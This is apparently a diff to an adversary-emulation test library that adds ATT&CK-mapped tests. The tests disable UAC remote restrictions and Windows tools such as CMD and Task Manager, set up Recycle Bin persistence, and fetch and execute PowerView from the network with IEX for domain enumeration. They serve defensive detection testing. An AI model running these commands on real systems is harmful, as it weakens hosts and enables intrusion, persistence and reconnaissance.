+  auto_generated_guid: 0b79c06f-c788-44a2-8630-d69051f1123d
+  description: |
+    This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
+    The steps are as follows:
+    <ol>
+        <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
+        <li>2. Enable OS to share network connections between different privilege levels</li>
+        <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
+    </ol>
+    The registry keys and their respective values will be created upon successful execution.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -PropertyType DWord -Value 1 -Force
+      New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force
+      New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force
+    cleanup_command: |
+      Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force -ErrorAction Ignore
+      Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force -ErrorAction Ignore
+      Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force -ErrorAction Ignore
+    name: powershell
+    elevation_required: true
+- name: Disable Windows Registry Tool
+  auto_generated_guid: ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry.
+    See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Disable Windows CMD application
+  auto_generated_guid: d2561a6d-72bd-408c-b150-13efe1801c2a
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows CMD application.
+    See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d "1" /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Disable Windows Task Manager application
+  auto_generated_guid: af254e70-dd0e-4de6-9afe-a994d9ea8b62
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application.
+    See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Disable Windows Notification Center
+  auto_generated_guid: c0d6d67f-1f63-42cc-95c0-5fd6b20082ad
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center.
+    See how remcos rat abuse this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Disable Windows Shutdown Button
+  auto_generated_guid: 6e0d1131-2d7e-4905-8ca5-d6172f05d03d
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button.
+    See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f
+    cleanup_command: |
+      reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Disable Windows LogOff Button 
+  auto_generated_guid: e246578a-c24d-46a7-9237-0213ff86fb0c
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button.
+    See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /t REG_DWORD /d 1 /f
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /f >nul 2>&1
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Disable Windows Change Password Feature
+  auto_generated_guid: d4a6da40-618f-454d-9a9e-26af552aaeb0
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature.
+    See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Disable Windows Lock Workstation Feature
+  auto_generated_guid: 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature.
+    See how ransomware abuse this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
@@ -186,7 +186,7 @@ if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi
 ```
 ##### Get Prereq Commands:
 ```bash
-sudo apt-get -y install graphicsmagick-imagemagick-compat
+sudo apt install graphicsmagick-imagemagick-compat
 ```


@@ -86,7 +86,7 @@ atomic_tests:
    prereq_command: |
      if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi
    get_prereq_command: |
-      sudo apt-get -y install graphicsmagick-imagemagick-compat
+      sudo apt install graphicsmagick-imagemagick-compat
  executor:
    command: |
      import -window root #{output_file}
@@ -20,6 +20,10 @@ Password policies can be set and discovered on Windows, Linux, and macOS systems

 - [Atomic Test #7 - Examine password policy - macOS](#atomic-test-7---examine-password-policy---macos)

+- [Atomic Test #8 - Get-DomainPolicy with PowerView](#atomic-test-8---get-domainpolicy-with-powerview)
+
+- [Atomic Test #9 - Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy](#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy)
+

 <br/>

@@ -241,4 +245,63 @@ pwpolicy getaccountpolicies



+<br/>
+<br/>
+
+## Atomic Test #8 - Get-DomainPolicy with PowerView
+Utilizing PowerView, run Get-DomainPolicy to return the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3177f4da-3d4b-4592-8bdc-aa23d0b2e843
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #9 - Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy
+The following Atomic test will utilize get-addefaultdomainpasswordpolicy to enumerate domain password policy.
+Upon successful execution a listing of the policy implemented will display.
+Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b2698b33-984c-4a1c-93bb-e4ba72a0babb
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+get-addefaultdomainpasswordpolicy
+```
+
+
+
+
+
+
 <br/>
@@ -85,4 +85,27 @@ atomic_tests:
  executor:
    command: pwpolicy getaccountpolicies
    name: bash
-
+- name: Get-DomainPolicy with PowerView
+  auto_generated_guid: 3177f4da-3d4b-4592-8bdc-aa23d0b2e843
+  description: |
+    Utilizing PowerView, run Get-DomainPolicy to return the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose
+    name: powershell
+- name: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy
+  auto_generated_guid: b2698b33-984c-4a1c-93bb-e4ba72a0babb
+  description: |
+    The following Atomic test will utilize get-addefaultdomainpasswordpolicy to enumerate domain password policy.
+    Upon successful execution a listing of the policy implemented will display.
+    Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      get-addefaultdomainpasswordpolicy
@@ -56,6 +56,8 @@ Adversaries can use these configuration locations to execute malware, such as re

 - [Atomic Test #7 - Add Executable Shortcut Link to User Startup Folder](#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder)

+- [Atomic Test #8 - Add persistance via Recycle bin](#atomic-test-8---add-persistance-via-recycle-bin)
+

 <br/>

@@ -326,4 +328,37 @@ Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup



+<br/>
+<br/>
+
+## Atomic Test #8 - Add persistance via Recycle bin
+Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf)
+User have to clic on the recycle bin to lauch the payload (here calc)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** bda6a3d6-7aa7-4e89-908b-306772e9662f
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f
+```
+
+
+
+
+
 <br/>
@@ -139,3 +139,15 @@ atomic_tests:
    cleanup_command: Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore
    name: powershell
    elevation_required: true 
+
+- name: Add persistance via Recycle bin
+  auto_generated_guid: bda6a3d6-7aa7-4e89-908b-306772e9662f
+  description: |
+    Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf)
+    User have to clic on the recycle bin to lauch the payload (here calc)
+  supported_platforms:
+  - windows
+  executor:
+    command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f  
+    cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f
+    name: command_prompt
@@ -0,0 +1,44 @@
+# T1547 - Boot or Logon Autostart Execution
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1547)
+<blockquote>Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
+
+Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Add a driver](#atomic-test-1---add-a-driver)
+
+
+<br/>
+
+## Atomic Test #1 - Add a driver
+Install a driver via pnputil.exe lolbin
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** cb01b3da-b0e7-4e24-bf6d-de5223526785
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| driver_inf | A built-in, already installed windows driver inf | Path | C:&#92;Windows&#92;INF&#92;usbstor.inf|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+pnputil.exe /add-driver "#{driver_inf}"
+```
+
+
+
+
+
+
+<br/>
@@ -0,0 +1,18 @@
+attack_technique: T1547
+display_name: 'Boot or Logon Autostart Execution'
+atomic_tests:
+- name: Add a driver
+  auto_generated_guid: cb01b3da-b0e7-4e24-bf6d-de5223526785
+  description: |
+    Install a driver via pnputil.exe lolbin
+  supported_platforms:
+  - windows
+  input_arguments:
+    driver_inf:
+      description: A built-in, already installed windows driver inf
+      type: Path    
+      default: 'C:\Windows\INF\usbstor.inf'
+  executor:
+    command: |
+      pnputil.exe /add-driver "#{driver_inf}"
+    name: command_prompt
@@ -14,6 +14,8 @@ Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003)

 - [Atomic Test #1 - Rubeus asreproast](#atomic-test-1---rubeus-asreproast)

+- [Atomic Test #2 - Get-DomainUser with PowerView](#atomic-test-2---get-domainuser-with-powerview)
+

 <br/>

@@ -76,4 +78,33 @@ Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable



+<br/>
+<br/>
+
+## Atomic Test #2 - Get-DomainUser with PowerView
+Utilizing PowerView, run Get-DomainUser to identify domain users. Upon execution, progress and info about users within the domain being scanned will be displayed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d6139549-7b72-4e48-9ea1-324fc9bdf88a
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
+```
+
+
+
+
+
+
 <br/>
@@ -46,3 +46,14 @@ atomic_tests:
      Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
    name: powershell
    elevation_required: false
+- name: Get-DomainUser with PowerView
+  auto_generated_guid: d6139549-7b72-4e48-9ea1-324fc9bdf88a
+  description: |
+    Utilizing PowerView, run Get-DomainUser to identify domain users. Upon execution, progress and info about users within the domain being scanned will be displayed.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
+    name: powershell
@@ -880,3 +880,34 @@ c59f246a-34f8-4e4d-9276-c295ef9ba0dd
 12631354-fdbc-4164-92be-402527e748da
 5fc528dd-79de-47f5-8188-25572b7fafe0
 e895677d-4f06-49ab-91b6-ae3742d0a2ba
+35eb8d16-9820-4423-a2a1-90c4f5edd9ca
+6b2903ac-8f36-450d-9ad5-b220e8a2dcb9
+0b79c06f-c788-44a2-8630-d69051f1123d
+a27418de-bdce-4ebd-b655-38f04842bf0c
+64ede6ac-b57a-41c2-a7d1-32c6cd35397d
+9f4e344b-8434-41b3-85b1-d38f29d148d0
+43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8
+46352f40-f283-4fe5-b56d-d9a71750e145
+02e8be5a-3065-4e54-8cc8-a14d138834d3
+d6139549-7b72-4e48-9ea1-324fc9bdf88a
+97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
+b9d2e8ca-5520-4737-8076-4f08913da2c4
+e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
+3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8
+5a8a181c-2c8e-478d-a943-549305a01230
+93662494-5ed7-4454-a04c-8c8372808ac2
+3177f4da-3d4b-4592-8bdc-aa23d0b2e843
+b2698b33-984c-4a1c-93bb-e4ba72a0babb
+cb01b3da-b0e7-4e24-bf6d-de5223526785
+bda6a3d6-7aa7-4e89-908b-306772e9662f
+ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8
+d2561a6d-72bd-408c-b150-13efe1801c2a
+af254e70-dd0e-4de6-9afe-a994d9ea8b62
+c0d6d67f-1f63-42cc-95c0-5fd6b20082ad
+6e0d1131-2d7e-4905-8ca5-d6172f05d03d
+e246578a-c24d-46a7-9237-0213ff86fb0c
+d4a6da40-618f-454d-9a9e-26af552aaeb0
+3dacb0d2-46ee-4c27-ac1b-f9886bf91a56
+3b3809b6-a54b-4f5b-8aff-cb51f2e97b34
+b51239b4-0129-474f-a2b4-70f855b9f2c2
+640cbf6d-659b-498b-ba53-f6dd1a1cc02c